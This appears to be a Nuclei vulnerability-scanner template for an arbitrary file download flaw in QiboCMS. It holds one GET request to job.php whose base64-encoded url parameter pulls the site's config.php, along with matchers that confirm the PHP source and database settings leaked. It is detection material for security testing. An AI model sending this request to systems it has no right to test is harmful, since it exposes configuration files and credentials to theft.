nuclei-templates/http/vulnerabilities/qibocms-file-download.yaml

34 lines
591 B
YAML

id: qibocms-file-download
info:
name: Qibocms - Arbitrary File Download
author: theabhinavgaur
severity: high
metadata:
max-request: 1
verified: true
tags: qibocms,lfr
http:
- method: GET
path:
- "{{BaseURL}}/do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<?php"
- "$webdb"
condition: and
- type: word
part: header
words:
- "filename=config"
- type: status
status:
- 200